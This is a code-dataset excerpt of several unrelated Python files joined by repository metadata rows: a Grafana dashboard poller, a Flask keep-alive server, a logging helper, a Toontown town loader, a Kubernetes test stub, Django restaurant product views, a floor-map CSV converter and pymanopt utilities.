# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# For those usages not covered by the Apache License, Version 2.0 please
# contact: bdiaz@whitestack.com or glavado@whitestack.com
##
import logging
import time
import socket
import peewee
from osm_mon.dashboarder.service import DashboarderService
from osm_mon.core.config import Config
log = logging.getLogger(__name__)
class Dashboarder:
def __init__(self, config: Config):
self.conf = config
self.service = DashboarderService(config)
def dashboard_forever(self):
log.debug('dashboard_forever')
while True:
try:
socket.gethostbyname("grafana")
log.debug("Dashboard backend is running")
except socket.error:
log.debug("Dashboard backend is not available")
time.sleep(int(self.conf.get('dashboarder', 'interval')))
continue
try:
self.create_dashboards()
time.sleep(int(self.conf.get('dashboarder', 'interval')))
except peewee.PeeweeException:
log.exception("Database error consuming message: ")
raise
except Exception:
log.exception("Error creating dashboards")
def create_dashboards(self):
self.service.create_dashboards()
log.debug('I just called the dashboarder service!')
| 34.721311 | 75 | 0.65203 |
865e74f18242e153831029a057dbcbaa47588039 | 246 | py | Python | keep_alive.py | Soulsender/scarabbot | 0c92834c65579912643b95d8aa37b23a6cf08602 | [
"MIT"
] | 6 | 2021-06-15T01:26:46.000Z | 2022-01-21T06:04:04.000Z | keep_alive.py | Soulsender/scarabbot | 0c92834c65579912643b95d8aa37b23a6cf08602 | [
"MIT"
] | 10 | 2021-06-15T20:35:52.000Z | 2022-02-07T03:04:43.000Z | keep_alive.py | Soulsender/scarabbot | 0c92834c65579912643b95d8aa37b23a6cf08602 | [
"MIT"
] | 1 | 2021-07-12T09:25:53.000Z | 2021-07-12T09:25:53.000Z | from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Bot is online and pinging"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
| 15.375 | 38 | 0.642276 |
66f5ec2e08cf5874e13a23b85e84906eb4c3f528 | 1,254 | py | Python | libs/common.py | fangli/collector-fluentd | d96b7a9049a3e4bd0a73543f5cdab8b6b6d0b0f1 | [
"Apache-2.0"
] | 6 | 2015-01-27T04:31:45.000Z | 2020-05-11T08:58:54.000Z | libs/common.py | fangli/collector-fluentd | d96b7a9049a3e4bd0a73543f5cdab8b6b6d0b0f1 | [
"Apache-2.0"
] | null | null | null | libs/common.py | fangli/collector-fluentd | d96b7a9049a3e4bd0a73543f5cdab8b6b6d0b0f1 | [
"Apache-2.0"
] | 2 | 2017-03-02T09:02:15.000Z | 2020-05-11T08:59:21.000Z | #!/usr/bin/env python
# -*- coding:utf-8 -*-
#*********************************************************#
# @@ScriptName: common.py
# @@Author: Felix Lee <surivlee@gmail.com>
# @@Create Date: 12/26/2012
# @@Modify Date: 2013-12-06 18:22:40
# @@Function:
#*********************************************************#
__author__ = "Felix Lee <surivlee@gmail.com>"
__version__ = (0, 1)
import time
import config as conf
def log(message, level=0):
if level == -1:
sLevel = '[DEBUG]'
elif level == 0:
sLevel = '[INFO]'
elif level == 1:
sLevel = '[WARNING]'
elif level == 2:
sLevel = '[CRITICAL]'
else:
sLevel = '[FATAL]'
if conf.LOG_LEVEL.lower() == "debug":
level_defined = -1
elif conf.LOG_LEVEL.lower() == "info":
level_defined = 0
elif conf.LOG_LEVEL.lower() == "warning":
level_defined = 1
elif conf.LOG_LEVEL.lower() == "critical":
level_defined = 2
else:
level_defined = 3
if level >= level_defined:
try:
f = open(conf.LOG_FILE, 'a')
f.write(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime()) + ' ' + sLevel + ' ' + message + '\n')
f.close()
except:
pass
| 24.115385 | 111 | 0.486443 |
5bf3953ace7029c44ceccbd62e49334a892dca03 | 16,453 | py | Python | toontown/town/TownLoader.py | TopDeveloper-333/opentoontownsrc | b2d956d1a40f5e3d40fa33a9f01862137e018347 | [
"BSD-3-Clause"
] | null | null | null | toontown/town/TownLoader.py | TopDeveloper-333/opentoontownsrc | b2d956d1a40f5e3d40fa33a9f01862137e018347 | [
"BSD-3-Clause"
] | null | null | null | toontown/town/TownLoader.py | TopDeveloper-333/opentoontownsrc | b2d956d1a40f5e3d40fa33a9f01862137e018347 | [
"BSD-3-Clause"
] | null | null | null | from pandac.PandaModules import *
from toontown.battle.BattleProps import *
from toontown.battle.BattleSounds import *
from toontown.distributed.ToontownMsgTypes import *
from toontown.toonbase.ToontownGlobals import *
from direct.gui.DirectGui import cleanupDialog
from direct.directnotify import DirectNotifyGlobal
from toontown.hood import Place
from direct.showbase import DirectObject
from direct.fsm import StateData
from direct.fsm import ClassicFSM, State
from direct.fsm import State
from direct.task import Task
import TownBattle
from toontown.toon import Toon
from toontown.toon.Toon import teleportDebug
from toontown.battle import BattleParticles
from direct.fsm import StateData
from toontown.building import ToonInterior
from toontown.hood import QuietZoneState
from toontown.hood import ZoneUtil
from direct.interval.IntervalGlobal import *
class TownLoader(StateData.StateData):
notify = DirectNotifyGlobal.directNotify.newCategory('TownLoader')
def __init__(self, hood, parentFSMState, doneEvent):
StateData.StateData.__init__(self, doneEvent)
self.hood = hood
self.parentFSMState = parentFSMState
self.fsm = ClassicFSM.ClassicFSM('TownLoader', [State.State('start', self.enterStart, self.exitStart, ['quietZone', 'street', 'toonInterior']),
State.State('street', self.enterStreet, self.exitStreet, ['quietZone']),
State.State('toonInterior', self.enterToonInterior, self.exitToonInterior, ['quietZone']),
State.State('quietZone', self.enterQuietZone, self.exitQuietZone, ['street', 'toonInterior']),
State.State('final', self.enterFinal, self.exitFinal, ['start'])], 'start', 'final')
self.branchZone = None
self.canonicalBranchZone = None
self.placeDoneEvent = 'placeDone'
self.townBattleDoneEvent = 'town-battle-done'
return
def loadBattleAnims(self):
Toon.loadBattleAnims()
def unloadBattleAnims(self):
Toon.unloadBattleAnims()
def load(self, zoneId):
self.zoneId = zoneId
self.parentFSMState.addChild(self.fsm)
self.loadBattleAnims()
self.branchZone = ZoneUtil.getBranchZone(zoneId)
self.canonicalBranchZone = ZoneUtil.getCanonicalBranchZone(zoneId)
self.music = base.loader.loadMusic(self.musicFile)
self.activityMusic = base.loader.loadMusic(self.activityMusicFile)
self.battleMusic = base.loader.loadMusic('phase_3.5/audio/bgm/encntr_general_bg.mid')
self.townBattle = TownBattle.TownBattle(self.townBattleDoneEvent)
self.townBattle.load()
def unload(self):
self.unloadBattleAnims()
globalPropPool.unloadProps()
globalBattleSoundCache.clear()
BattleParticles.unloadParticles()
self.parentFSMState.removeChild(self.fsm)
del self.parentFSMState
del self.fsm
del self.streetClass
self.landmarkBlocks.removeNode()
del self.landmarkBlocks
self.hood.dnaStore.resetSuitPoints()
self.hood.dnaStore.resetBattleCells()
del self.hood
del self.nodeDict
del self.zoneDict
if base.cr.astronSupport:
del self.node2zone
del self.fadeInDict
del self.fadeOutDict
del self.nodeList
self.geom.removeNode()
del self.geom
self.townBattle.unload()
self.townBattle.cleanup()
del self.townBattle
del self.battleMusic
del self.music
del self.activityMusic
del self.holidayPropTransforms
self.deleteAnimatedProps()
cleanupDialog('globalDialog')
ModelPool.garbageCollect()
TexturePool.garbageCollect()
def enter(self, requestStatus):
teleportDebug(requestStatus, 'TownLoader.enter(%s)' % requestStatus)
self.fsm.enterInitialState()
teleportDebug(requestStatus, 'setting state: %s' % requestStatus['where'])
self.setState(requestStatus['where'], requestStatus)
def exit(self):
self.ignoreAll()
def setState(self, stateName, requestStatus):
self.fsm.request(stateName, [requestStatus])
def enterStart(self):
pass
def exitStart(self):
pass
def enterStreet(self, requestStatus):
teleportDebug(requestStatus, 'enterStreet(%s)' % requestStatus)
self.acceptOnce(self.placeDoneEvent, self.streetDone)
self.place = self.streetClass(self, self.fsm, self.placeDoneEvent)
self.place.load()
base.cr.playGame.setPlace(self.place)
self.place.enter(requestStatus)
def exitStreet(self):
self.place.exit()
self.place.unload()
self.place = None
base.cr.playGame.setPlace(self.place)
return
def streetDone(self):
self.requestStatus = self.place.doneStatus
status = self.place.doneStatus
if status['loader'] == 'townLoader' and ZoneUtil.getBranchZone(status['zoneId']) == self.branchZone and status['shardId'] == None:
self.fsm.request('quietZone', [status])
else:
self.doneStatus = status
messenger.send(self.doneEvent)
return
def enterToonInterior(self, requestStatus):
self.acceptOnce(self.placeDoneEvent, self.handleToonInteriorDone)
self.place = ToonInterior.ToonInterior(self, self.fsm.getStateNamed('toonInterior'), self.placeDoneEvent)
base.cr.playGame.setPlace(self.place)
self.place.load()
self.place.enter(requestStatus)
def exitToonInterior(self):
self.ignore(self.placeDoneEvent)
self.place.exit()
self.place.unload()
self.place = None
base.cr.playGame.setPlace(self.place)
return
def handleToonInteriorDone(self):
status = self.place.doneStatus
if ZoneUtil.getBranchZone(status['zoneId']) == self.branchZone and status['shardId'] == None:
self.fsm.request('quietZone', [status])
else:
self.doneStatus = status
messenger.send(self.doneEvent)
return
def enterQuietZone(self, requestStatus):
self.quietZoneDoneEvent = uniqueName('quietZoneDone')
self.acceptOnce(self.quietZoneDoneEvent, self.handleQuietZoneDone)
self.quietZoneStateData = QuietZoneState.QuietZoneState(self.quietZoneDoneEvent)
self.quietZoneStateData.load()
self.quietZoneStateData.enter(requestStatus)
def exitQuietZone(self):
self.ignore(self.quietZoneDoneEvent)
del self.quietZoneDoneEvent
self.quietZoneStateData.exit()
self.quietZoneStateData.unload()
self.quietZoneStateData = None
return
def handleQuietZoneDone(self):
status = self.quietZoneStateData.getRequestStatus()
self.fsm.request(status['where'], [status])
def enterFinal(self):
pass
def exitFinal(self):
pass
def createHood(self, dnaFile, loadStorage = 1):
if loadStorage:
loader.loadDNAFile(self.hood.dnaStore, 'phase_5/dna/storage_town.dna')
self.notify.debug('done loading %s' % 'phase_5/dna/storage_town.dna')
loader.loadDNAFile(self.hood.dnaStore, self.townStorageDNAFile)
self.notify.debug('done loading %s' % self.townStorageDNAFile)
node = loader.loadDNAFile(self.hood.dnaStore, dnaFile)
self.notify.debug('done loading %s' % dnaFile)
if node.getNumParents() == 1:
self.geom = NodePath(node.getParent(0))
self.geom.reparentTo(hidden)
else:
self.geom = hidden.attachNewNode(node)
self.makeDictionaries(self.hood.dnaStore)
self.reparentLandmarkBlockNodes()
self.renameFloorPolys(self.nodeList)
self.createAnimatedProps(self.nodeList)
self.holidayPropTransforms = {}
npl = self.geom.findAllMatches('**/=DNARoot=holiday_prop')
for i in range(npl.getNumPaths()):
np = npl.getPath(i)
np.setTag('transformIndex', `i`)
self.holidayPropTransforms[i] = np.getNetTransform()
self.notify.info('skipping self.geom.flattenMedium')
gsg = base.win.getGsg()
if gsg:
self.geom.prepareScene(gsg)
self.geom.setName('town_top_level')
def reparentLandmarkBlockNodes(self):
bucket = self.landmarkBlocks = hidden.attachNewNode('landmarkBlocks')
npc = self.geom.findAllMatches('**/sb*:*_landmark_*_DNARoot')
for i in range(npc.getNumPaths()):
nodePath = npc.getPath(i)
nodePath.wrtReparentTo(bucket)
npc = self.geom.findAllMatches('**/sb*:*animated_building*_DNARoot')
for i in range(npc.getNumPaths()):
nodePath = npc.getPath(i)
nodePath.wrtReparentTo(bucket)
def makeDictionaries(self, dnaStore):
self.nodeDict = {}
self.zoneDict = {}
if base.cr.astronSupport:
self.node2zone = {}
self.nodeList = []
self.fadeInDict = {}
self.fadeOutDict = {}
a1 = Vec4(1, 1, 1, 1)
a0 = Vec4(1, 1, 1, 0)
numVisGroups = dnaStore.getNumDNAVisGroups()
for i in range(numVisGroups):
groupFullName = dnaStore.getDNAVisGroupName(i)
groupName = base.cr.hoodMgr.extractGroupName(groupFullName)
zoneId = int(groupName)
zoneId = ZoneUtil.getTrueZoneId(zoneId, self.zoneId)
groupNode = self.geom.find('**/' + groupFullName)
if groupNode.isEmpty():
self.notify.error('Could not find visgroup')
else:
if ':' in groupName:
groupName = '%s%s' % (zoneId, groupName[groupName.index(':'):])
else:
groupName = '%s' % zoneId
groupNode.setName(groupName)
self.nodeDict[zoneId] = []
self.nodeList.append(groupNode)
self.zoneDict[zoneId] = groupNode
if base.cr.astronSupport:
self.node2zone[groupNode] = zoneId
fadeDuration = 0.5
self.fadeOutDict[groupNode] = Sequence(Func(groupNode.setTransparency, 1), LerpColorScaleInterval(groupNode, fadeDuration, a0, startColorScale=a1), Func(groupNode.clearColorScale), Func(groupNode.clearTransparency), Func(groupNode.stash), name='fadeZone-' + str(zoneId), autoPause=1)
self.fadeInDict[groupNode] = Sequence(Func(groupNode.unstash), Func(groupNode.setTransparency, 1), LerpColorScaleInterval(groupNode, fadeDuration, a1, startColorScale=a0), Func(groupNode.clearColorScale), Func(groupNode.clearTransparency), name='fadeZone-' + str(zoneId), autoPause=1)
for i in range(numVisGroups):
groupFullName = dnaStore.getDNAVisGroupName(i)
zoneId = int(base.cr.hoodMgr.extractGroupName(groupFullName))
zoneId = ZoneUtil.getTrueZoneId(zoneId, self.zoneId)
for j in range(dnaStore.getNumVisiblesInDNAVisGroup(i)):
visName = dnaStore.getVisibleName(i, j)
groupName = base.cr.hoodMgr.extractGroupName(visName)
nextZoneId = int(groupName)
nextZoneId = ZoneUtil.getTrueZoneId(nextZoneId, self.zoneId)
visNode = self.zoneDict[nextZoneId]
self.nodeDict[zoneId].append(visNode)
self.hood.dnaStore.resetPlaceNodes()
self.hood.dnaStore.resetDNAGroups()
self.hood.dnaStore.resetDNAVisGroups()
self.hood.dnaStore.resetDNAVisGroupsAI()
def renameFloorPolys(self, nodeList):
for i in nodeList:
collNodePaths = i.findAllMatches('**/+CollisionNode')
numCollNodePaths = collNodePaths.getNumPaths()
visGroupName = i.node().getName()
for j in range(numCollNodePaths):
collNodePath = collNodePaths.getPath(j)
bitMask = collNodePath.node().getIntoCollideMask()
if bitMask.getBit(1):
collNodePath.node().setName(visGroupName)
def createAnimatedProps(self, nodeList):
self.animPropDict = {}
self.zoneIdToInteractivePropDict = {}
for i in nodeList:
animPropNodes = i.findAllMatches('**/animated_prop_*')
numAnimPropNodes = animPropNodes.getNumPaths()
for j in range(numAnimPropNodes):
animPropNode = animPropNodes.getPath(j)
if animPropNode.getName().startswith('animated_prop_generic'):
className = 'GenericAnimatedProp'
elif animPropNode.getName().startswith('animated_prop_'):
name = animPropNode.getName()[len('animated_prop_'):]
splits = name.split('_')
className = splits[0]
else:
className = animPropNode.getName()[14:-8]
symbols = {}
base.cr.importModule(symbols, 'toontown.hood', [className])
classObj = getattr(symbols[className], className)
animPropObj = classObj(animPropNode)
animPropList = self.animPropDict.setdefault(i, [])
animPropList.append(animPropObj)
interactivePropNodes = i.findAllMatches('**/interactive_prop_*')
numInteractivePropNodes = interactivePropNodes.getNumPaths()
for j in range(numInteractivePropNodes):
interactivePropNode = interactivePropNodes.getPath(j)
className = 'InteractiveAnimatedProp'
if 'hydrant' in interactivePropNode.getName():
className = 'HydrantInteractiveProp'
elif 'trashcan' in interactivePropNode.getName():
className = 'TrashcanInteractiveProp'
elif 'mailbox' in interactivePropNode.getName():
className = 'MailboxInteractiveProp'
symbols = {}
base.cr.importModule(symbols, 'toontown.hood', [className])
classObj = getattr(symbols[className], className)
interactivePropObj = classObj(interactivePropNode)
animPropList = self.animPropDict.get(i)
if animPropList is None:
animPropList = self.animPropDict.setdefault(i, [])
animPropList.append(interactivePropObj)
if interactivePropObj.getCellIndex() == 0:
zoneId = int(i.getName())
if zoneId not in self.zoneIdToInteractivePropDict:
self.zoneIdToInteractivePropDict[zoneId] = interactivePropObj
else:
self.notify.error('already have interactive prop %s in zone %s' % (self.zoneIdToInteractivePropDict, zoneId))
animatedBuildingNodes = i.findAllMatches('**/*:animated_building_*;-h')
for np in animatedBuildingNodes:
if np.getName().startswith('sb'):
animatedBuildingNodes.removePath(np)
numAnimatedBuildingNodes = animatedBuildingNodes.getNumPaths()
for j in range(numAnimatedBuildingNodes):
animatedBuildingNode = animatedBuildingNodes.getPath(j)
className = 'GenericAnimatedBuilding'
symbols = {}
base.cr.importModule(symbols, 'toontown.hood', [className])
classObj = getattr(symbols[className], className)
animatedBuildingObj = classObj(animatedBuildingNode)
animPropList = self.animPropDict.get(i)
if animPropList is None:
animPropList = self.animPropDict.setdefault(i, [])
animPropList.append(animatedBuildingObj)
return
def deleteAnimatedProps(self):
for zoneNode, animPropList in self.animPropDict.items():
for animProp in animPropList:
animProp.delete()
del self.animPropDict
def enterAnimatedProps(self, zoneNode):
for animProp in self.animPropDict.get(zoneNode, ()):
animProp.enter()
def exitAnimatedProps(self, zoneNode):
for animProp in self.animPropDict.get(zoneNode, ()):
animProp.exit()
def getInteractiveProp(self, zoneId):
result = None
if zoneId in self.zoneIdToInteractivePropDict:
result = self.zoneIdToInteractivePropDict[zoneId]
return result
| 43.297368 | 296 | 0.642436 |
cd28c675fcee3b17d75eab6f42f691a9b69ac45e | 1,124 | py | Python | kubernetes/test/test_v1alpha1_initializer_configuration_list.py | reymont/python | 02a3a31c630c305527b328af49724f348fbdae15 | [
"Apache-2.0"
] | 1 | 2018-10-20T19:37:57.000Z | 2018-10-20T19:37:57.000Z | kubernetes/test/test_v1alpha1_initializer_configuration_list.py | reymont/python | 02a3a31c630c305527b328af49724f348fbdae15 | [
"Apache-2.0"
] | null | null | null | kubernetes/test/test_v1alpha1_initializer_configuration_list.py | reymont/python | 02a3a31c630c305527b328af49724f348fbdae15 | [
"Apache-2.0"
] | 2 | 2018-07-27T19:39:34.000Z | 2020-12-25T02:48:27.000Z | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.11.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kubernetes.client
from kubernetes.client.rest import ApiException
from kubernetes.client.models.v1alpha1_initializer_configuration_list import V1alpha1InitializerConfigurationList
class TestV1alpha1InitializerConfigurationList(unittest.TestCase):
""" V1alpha1InitializerConfigurationList unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testV1alpha1InitializerConfigurationList(self):
"""
Test V1alpha1InitializerConfigurationList
"""
# FIXME: construct object with mandatory attributes with example values
#model = kubernetes.client.models.v1alpha1_initializer_configuration_list.V1alpha1InitializerConfigurationList()
pass
if __name__ == '__main__':
unittest.main()
| 24.977778 | 120 | 0.75089 |
0c8c53ab65a9dd249925f4f1d5a3e51e82239b86 | 10,279 | py | Python | products/views.py | tiagocordeiro/gomenu | b5cbf7edb52a88828815c7865f7870eb5a4b303a | [
"MIT"
] | 4 | 2020-08-13T12:07:33.000Z | 2022-02-20T11:18:54.000Z | products/views.py | tiagocordeiro/gomenu | b5cbf7edb52a88828815c7865f7870eb5a4b303a | [
"MIT"
] | 246 | 2020-06-30T14:28:22.000Z | 2022-03-27T14:51:58.000Z | products/views.py | tiagocordeiro/gomenu | b5cbf7edb52a88828815c7865f7870eb5a4b303a | [
"MIT"
] | 1 | 2020-08-13T12:06:50.000Z | 2020-08-13T12:06:50.000Z | from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.forms import inlineformset_factory
from django.http import JsonResponse
from django.shortcuts import render, redirect, get_object_or_404
from django.views.decorators.http import require_POST
from products.facade import get_product, get_from_category
from products.forms import CategoryForm, ProductVariationForm, ProductForm
from products.models import Category, Product, ProductVariation
from restaurants.models import Restaurant, RestaurantIntegrations
@login_required
def categories_list(request):
if request.user.groups.filter(name="Customer").exists():
messages.warning(request, "Você não pode acessar essa página")
return redirect('orders_list')
categories = Category.objects.filter(restaurant__manager=request.user)
context = {'categories': categories}
return render(request, 'products/list_categories.html', context)
@login_required
def category_new(request):
if request.user.groups.filter(name="Customer").exists():
messages.warning(request, "Você não pode acessar essa página")
return redirect('orders_list')
try:
restaurant = Restaurant.objects.get(manager=request.user)
except Restaurant.DoesNotExist:
messages.warning(request, "Você precisa cadastrar um restaurante")
return redirect('new_restaurant')
if request.method == "POST":
form = CategoryForm(request.POST)
if form.is_valid():
category = form.save(commit=False)
category.restaurant = restaurant
category.save()
messages.success(request, "Nova categoria cadastrada.")
return redirect(categories_list)
else:
form = CategoryForm()
return render(request, 'products/category_new.html', {'form': form})
def category_update(request, pk):
category = get_object_or_404(Category, pk=pk)
if request.user.is_superuser or request.user == category.restaurant.manager:
pass
else:
messages.warning(request, "Você não tem permissão.")
return redirect('dashboard')
if request.method == 'POST':
form = CategoryForm(request.POST, instance=category)
try:
if form.is_valid():
form.save()
messages.success(request, "Categoria atualizada")
return redirect('category_update', pk=pk)
except Exception as e:
messages.warning(request,
'Ocorreu um erro ao atualizar: {}'.format(e))
else:
form = CategoryForm(instance=category)
return render(request, 'products/category_update.html', {'form': form})
@login_required
def products_list(request):
if request.user.groups.filter(name="Customer").exists():
messages.warning(request, "Você não pode acessar essa página")
return redirect('orders_list')
products = Product.objects.all().order_by('category__name', 'name').filter(
restaurant__manager=request.user)
simple_products = products.filter(productvariation__isnull=True)
variation_products = ProductVariation.objects.all().filter(
product__restaurant__manager=request.user)
context = {
'simple_products': simple_products,
'variation_products': variation_products,
}
return render(request, 'products/list_products.html', context=context)
@login_required
def products_sort(request, category=None):
if category is None:
products = Product.objects.all().order_by('order', 'category__name', 'name').filter(
restaurant__manager=request.user)
else:
products = Product.objects.all().order_by('order', 'category__name', 'name').filter(
restaurant__manager=request.user, category=category)
context = {'products': products,
'category': category}
return render(request, 'products/sort_products.html', context=context)
@login_required
@require_POST
def save_new_ordering(request):
ordered_ids = request.POST["ordering"]
category = request.POST["categoryfilter"]
if len(ordered_ids) < 1:
messages.success(request, "Nenhum produto para atualizar")
return redirect('products_sort')
current_order = 10
for lookup_id in ordered_ids.split(","):
product = Product.objects.get(pk=lookup_id)
product.order = current_order
product.save()
current_order += 10
messages.success(request, "Ordem de produtos atualizada.")
if category == "None":
return redirect('products_sort')
return redirect('products_sort', category)
@login_required
def product_new(request):
if request.user.groups.filter(name="Customer").exists():
messages.warning(request, "Você não pode acessar essa página")
return redirect('orders_list')
try:
restaurant = Restaurant.objects.get(manager=request.user)
except Restaurant.DoesNotExist:
messages.warning(request, "Você precisa cadastrar um restaurante")
return redirect('new_restaurant')
product_form = Product()
variations_formset = inlineformset_factory(Product, ProductVariation,
form=ProductVariationForm,
extra=1)
if request.method == "POST":
form = ProductForm(request.POST, instance=product_form, prefix='main')
form.fields["category"].queryset = Category.objects.filter(
restaurant__manager=request.user)
formset = variations_formset(request.POST, instance=product_form,
prefix='product')
if form.is_valid() and formset.is_valid():
novo_produto = form.save(commit=False)
novo_produto.restaurant = restaurant
novo_produto.save()
formset.save()
messages.success(request, "Novo produto cadastrado.")
return redirect(products_list)
else:
form = ProductForm(instance=product_form, prefix='main')
form.fields["category"].queryset = Category.objects.filter(
restaurant__manager=request.user)
formset = variations_formset(instance=product_form, prefix='product')
return render(request, 'products/product_new.html', {'form': form,
'formset': formset})
@login_required
def product_update(request, pk):
product = get_object_or_404(Product, pk=pk)
if request.user.is_superuser or request.user == product.restaurant.manager:
pass
else:
messages.warning(request, "Você não tem permissão.")
return redirect('dashboard')
variations_formset = inlineformset_factory(Product, ProductVariation,
form=ProductVariationForm,
extra=1)
if request.method == 'POST':
form = ProductForm(request.POST, instance=product, prefix='main')
formset = variations_formset(request.POST, instance=product,
prefix='product')
try:
if form.is_valid() and formset.is_valid():
form.save()
formset.save()
messages.success(request, "Produto atualizado")
return redirect('product_update', pk=pk)
except Exception as e:
messages.warning(request,
'Ocorreu um erro ao atualizar: {}'.format(e))
else:
form = ProductForm(instance=product, prefix='main')
formset = variations_formset(instance=product, prefix='product')
return render(request, 'products/product_update.html', {'form': form,
'formset': formset, })
@login_required
def import_from_woocommerce(request, product_id):
if request.user.groups.filter(name="Customer").exists():
messages.warning(request, "Você não pode acessar essa página")
return redirect('orders_list')
try:
restaurant = Restaurant.objects.get(manager=request.user)
except Restaurant.DoesNotExist:
messages.warning(request, "Você precisa cadastrar um restaurante")
return redirect('new_restaurant')
try:
woo_integration_data = restaurant.restaurantintegrations_set
consumer_key = woo_integration_data.get().wc_consumer_key
consumer_secret = woo_integration_data.get().wc_consumer_secret
woo_commerce_url = woo_integration_data.get().woo_commerce_url
except RestaurantIntegrations.DoesNotExist:
messages.warning(request, "Solicite a integração para o suporte")
return redirect('dashboard')
product = get_product(product_id=product_id,
consumer_key=consumer_key,
consumer_secret=consumer_secret,
woo_commerce_url=woo_commerce_url)
return JsonResponse(product.json())
@login_required
def import_all_from_woocommerce_category(request, category_id):
if request.user.groups.filter(name="Customer").exists():
messages.warning(request, "Você não pode acessar essa página")
return redirect('orders_list')
try:
restaurant = Restaurant.objects.get(manager=request.user)
except Restaurant.DoesNotExist:
messages.warning(request, "Você precisa cadastrar um restaurante")
return redirect('new_restaurant')
try:
woo_integration_data = restaurant.restaurantintegrations_set
consumer_key = woo_integration_data.get().wc_consumer_key
consumer_secret = woo_integration_data.get().wc_consumer_secret
woo_commerce_url = woo_integration_data.get().woo_commerce_url
except RestaurantIntegrations.DoesNotExist:
messages.warning(request, "Solicite a integração para o suporte")
return redirect('dashboard')
products = get_from_category(category_id, restaurant=restaurant,
consumer_key=consumer_key,
consumer_secret=consumer_secret,
woo_commerce_url=woo_commerce_url)
return JsonResponse(products)
| 37.652015 | 92 | 0.662321 |
66e2834200e3ca0ae61b80e17c25d56186bc1f94 | 2,053 | py | Python | go-convert-v2.py | muzudho/ascii-based-floor-map-to-csv | b43f808a24358b3a9da5bb74bf4b5e8155ab752a | [
"MIT"
] | null | null | null | go-convert-v2.py | muzudho/ascii-based-floor-map-to-csv | b43f808a24358b3a9da5bb74bf4b5e8155ab752a | [
"MIT"
] | null | null | null | go-convert-v2.py | muzudho/ascii-based-floor-map-to-csv | b43f808a24358b3a9da5bb74bf4b5e8155ab752a | [
"MIT"
] | null | null | null | #
# Note.
#
# Root directory: Visual studio code workspace root.
#
block_input_file = "./ascii-floor-map-to-csv/data/block-map.txt"
table_input_file = "./ascii-floor-map-to-csv/data/table-number-map.txt"
output_file_name = "./ascii-floor-map-to-csv/auto-generated/floor-map.csv"
try:
bl_file = open(block_input_file)
try:
ta_file = open(table_input_file)
try:
out_file = open(output_file_name, 'w', encoding='utf-8')
# Column name, No space.
out_file.write("ID,X,Y,BLOCK\n")
id_column = []
x_column = []
y_column = []
block_column = []
bl_lines = bl_file.readlines()
for y, line in enumerate(bl_lines):
for x, block in enumerate(line):
if block != '.' and block != '\n':
x_column.append(x)
y_column.append(y)
block_column.append(block)
ta_lines = ta_file.readlines()
for row in ta_lines:
cols = row.split(",")
for x, number_text in enumerate(cols):
num = int(number_text)
if num != 0:
id_column.append(num)
# 机の個数をベースで。
print("len(id_column ):{}".format(len(id_column)))
print("len(x_column ):{}".format(len(x_column)))
print("len(y_column ):{}".format(len(y_column)))
print("len(block_column):{}".format(len(block_column)))
for i, block in enumerate(block_column):
# print("i:{}".format(i))
out_file.write("{},{},{},{}\n".format(
id_column[i], x_column[i], y_column[i], block))
except Exception as e:
print(e)
finally:
out_file.close()
except Exception as e:
print(e)
finally:
ta_file.close()
except Exception as e:
print(e)
finally:
bl_file.close()
print("Info : Finished.")
| 31.106061 | 74 | 0.512421 |
fff81170fef1dd1a1e1cfe94a912a5e9ae529aff | 3,297 | py | Python | pymanopt/tools/__init__.py | paulroujansky/pymanopt | 7ec0f83b2cc1bf325bfbbc98d69188cf6b7ef0f1 | [
"BSD-3-Clause"
] | null | null | null | pymanopt/tools/__init__.py | paulroujansky/pymanopt | 7ec0f83b2cc1bf325bfbbc98d69188cf6b7ef0f1 | [
"BSD-3-Clause"
] | null | null | null | pymanopt/tools/__init__.py | paulroujansky/pymanopt | 7ec0f83b2cc1bf325bfbbc98d69188cf6b7ef0f1 | [
"BSD-3-Clause"
] | null | null | null | import collections
import functools
def make_enum(name, fields):
return collections.namedtuple(name, fields)(*range(len(fields)))
class ndarraySequenceMixin:
# The following attributes ensure that operations on sequences of
# np.ndarrays with scalar numpy data types such as np.float64 don't attempt
# to vectorize the scalar variable. Refer to
#
# https://docs.scipy.org/doc/numpy/reference/arrays.classes.html
# https://github.com/pymanopt/pymanopt/issues/49
#
# for details.
__array_priority__ = 1000
__array_ufunc__ = None # Available since numpy 1.13
def _flatten_arguments_from_signature(arguments, signature):
flattened_arguments = []
for i, group in enumerate(signature):
if isinstance(group, (list, tuple)):
flattened_arguments.extend(arguments[i])
else:
flattened_arguments.append(arguments[i])
return tuple(flattened_arguments)
def flatten_arguments(arguments, signature=None):
"""Takes a sequence `arguments` containing tuples/lists of arguments or
unary arguments and returns a flattened tuple of arguments, e.g.
`flatten_arguments([1, 2], 3)` produces the tuple `(1, 2, 3)`. If the
nesting cannot be inferred from the types of objects contained in
`arguments` itself, one may pass the optional argument `signature` instead.
"""
if signature is not None:
return _flatten_arguments_from_signature(arguments, signature)
flattened_arguments = []
for argument in arguments:
if isinstance(argument, (list, tuple)):
flattened_arguments.extend(argument)
else:
flattened_arguments.append(argument)
return tuple(flattened_arguments)
def unpack_arguments(function, signature=None):
"""A decorator which wraps a function accepting a single sequence of
arguments and calls the function with unpacked arguments. If given, the
call arguments are unpacked according to the `signature' which is a string
representation of the argument grouping/nesting, e.g. `(("x", "y"), "z")'.
"""
@functools.wraps(function)
def inner(arguments):
return function(*flatten_arguments(arguments, signature=signature))
return inner
def group_return_values(function, signature):
"""Returns a wrapped version of `function` which groups the return values
of the function in the same way as defined by the signature given by
`signature`.
"""
if len(signature) == 1:
@functools.wraps(function)
def inner(*args):
return function(*args)
return inner
group_sizes = []
for element in signature:
if isinstance(element, (list, tuple)):
group_sizes.append(len(element))
else:
group_sizes.append(1)
@functools.wraps(function)
def inner(*args):
# TODO(nkoep): This function might be hot. Can we come up with a more
# elegant implementation?
return_values = function(*args)
groups = []
i = 0
for n in group_sizes:
if n == 1:
groups.append(return_values[i])
else:
groups.append(return_values[i:i+n])
